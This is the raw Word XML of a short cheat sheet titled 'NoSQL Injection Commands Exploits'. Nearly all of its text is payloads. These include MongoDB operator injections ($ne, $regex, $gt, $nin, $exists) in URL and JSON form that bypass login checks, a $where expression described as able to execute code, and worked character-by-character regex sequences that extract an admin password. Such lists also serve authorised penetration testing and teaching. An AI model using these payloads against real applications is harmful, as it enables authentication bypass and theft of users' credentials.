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240A" w14:textId="370B3CFA" w:rsidR="00730838" w:rsidRPr="00EB0396" w:rsidRDefault="00EB0396" w:rsidP="00EB0396">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB0396">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>NoSQL Injection</w:t>
      </w:r>
      <w:r w:rsidR="008F6539">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Commands</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB0396">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74887903" w14:textId="32976F56" w:rsid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25C8C4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username[$ne]=1$password[$ne]=1 #&lt;Not Equals&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E93E7EF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username[$regex]=^adm$password[$ne]=1 #Check a &lt;regular expression&gt;, could be used to brute-force a parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B35A8C5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username[$regex]=.{25}&amp;pass[$ne]=1 #Use the &lt;regex&gt; to find the length of a value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14986B9B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username[$eq]=admin&amp;password[$ne]=1 #&lt;Equals&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3664CB36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username[$ne]=admin&amp;pass[$lt]=s #&lt;Less than&gt;, Brute-force pass[$lt] to find more users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D4AF68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username[$ne]=admin&amp;pass[$gt]=s #&lt;Greater Than&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215A0BFD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username[$nin][admin]=admin&amp;username[$nin][test]=test&amp;pass[$ne]=7 #&lt;Matches non of the values of the array&gt; (not test and not admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76970AD5" w14:textId="4EB24911" w:rsid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{ $where: "this.credits == this.debits" }#&lt;IF&gt;, can be used to execute code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AA0039" w14:textId="77777777" w:rsid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8E9D79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#in URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323BF8CF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username[$ne]=toto&amp;password[$ne]=toto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C4EC79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username[$regex]=.*&amp;password[$regex]=.*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB0BE8A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username[$exists]=true&amp;password[$exists]=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298A9325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BB235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#in JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413064D5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{"username": {"$ne": null}, "password": {"$ne": null} }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78992774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{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084BAA0E" w14:textId="1CD74587" w:rsid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{"username": {"$gt": undefined}, "password": {"$gt": undefined} }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09931613" w14:textId="6AC29C0F" w:rsid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7802B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username[$ne]=toto&amp;password[$regex]=.{1}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108CE04B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username[$ne]=toto&amp;password[$regex]=.{3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E9DE64" w14:textId="22176821" w:rsid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# True if the length equals 1,3...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77027D45" w14:textId="358CC49E" w:rsid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96B5B6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in URL (if length == 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C5D9EB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username[$ne]=toto&amp;password[$regex]=a.{2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0645B4D6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username[$ne]=toto&amp;password[$regex]=b.{2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B372C84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...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB39553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lastRenderedPageBreak/>
        <w:t>username[$ne]=toto&amp;password[$regex]=m.{2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A747508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username[$ne]=toto&amp;password[$regex]=md.{1}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BA929E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username[$ne]=toto&amp;password[$regex]=mdp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509781A7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55BDBB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username[$ne]=toto&amp;password[$regex]=m.*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775C9582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username[$ne]=toto&amp;password[$regex]=md.*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E08F9E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F26FC0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in JSON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B5D9F0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{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4076A714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{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745FA14F" w14:textId="19155624" w:rsid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{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62965102" w14:textId="3BAEA0D4" w:rsid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2DD2FC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/?search=admin' &amp;&amp; this.password%00 --&gt; Check if the field password exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B03F9E4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/?search=admin' &amp;&amp; this.password &amp;&amp; this.password.match(/.*/)%00 --&gt; start matching password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629692B1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/?search=admin' &amp;&amp; this.password &amp;&amp; this.password.match(/^a.*$/)%00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45867BAC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/?search=admin' &amp;&amp; this.password &amp;&amp; this.password.match(/^b.*$/)%00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53435A7D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/?search=admin' &amp;&amp; this.password &amp;&amp; this.password.match(/^c.*$/)%00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F3418E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...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6426BDC0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/?search=admin' &amp;&amp; this.password &amp;&amp; this.password.match(/^duvj.*$/)%00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4A4E6F" w14:textId="77777777" w:rsidR="00EB0396" w:rsidRP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...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355CBC75" w14:textId="2B9330E9" w:rsidR="00EB0396" w:rsidRDefault="00EB0396" w:rsidP="00EB0396">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB0396">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/?search=admin' &amp;&amp; this.password &amp;&amp; this.password.match(/^duvj78i3u$/)%00  Found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C83814" w14:textId="441C4483" w:rsidR="008F6539" w:rsidRDefault="008F6539" w:rsidP="00EB03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7D28FD" w14:textId="5B9A2BC1" w:rsidR="008F6539" w:rsidRDefault="008F6539" w:rsidP="00EB03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8D6DA5" w14:textId="00B42751" w:rsidR="008F6539" w:rsidRDefault="008F6539" w:rsidP="00EB03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54EFC6" w14:textId="477F2BE3" w:rsidR="008F6539" w:rsidRDefault="008F6539" w:rsidP="00EB03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C38834" w14:textId="0C4D283B" w:rsidR="008F6539" w:rsidRDefault="008F6539" w:rsidP="00EB03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D244C" w14:textId="1E362851" w:rsidR="008F6539" w:rsidRDefault="008F6539" w:rsidP="00EB03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B56174" w14:textId="2F685132" w:rsidR="008F6539" w:rsidRDefault="008F6539" w:rsidP="00EB03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FFAB87" w14:textId="1E643502" w:rsidR="008F6539" w:rsidRDefault="008F6539" w:rsidP="00EB03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69820E" w14:textId="77777777" w:rsidR="008F6539" w:rsidRPr="00EB0396" w:rsidRDefault="008F6539" w:rsidP="00EB039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F6539" w:rsidRPr="00EB0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96"/>
    <w:rsid w:val="00730838"/>
    <w:rsid w:val="008F6539"/>
    <w:rsid w:val="00EB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6AAB1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1062686C-62EF-47D2-AD66-DD61EEFE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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-12-31T18:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-31T18:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>